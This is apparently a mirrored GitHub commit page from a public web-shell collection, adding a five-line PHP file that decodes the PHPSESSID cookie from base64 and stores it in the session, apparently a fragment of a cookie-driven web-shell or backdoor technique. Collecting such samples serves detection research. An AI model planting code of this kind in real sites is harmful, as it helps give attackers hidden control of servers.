1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00
tennc
2022-09-09 23:10:43 +08:00
committed by GitHub
parent f06a40760e
commit 4837a655b7

5
php/2022-09-09-02.php Normal file
View File

@@ -0,0 +1,5 @@
<?php
session_start();
$_SESSION['dmeo']=base64_decode($_COOKIE["PHPSESSID"]);
?>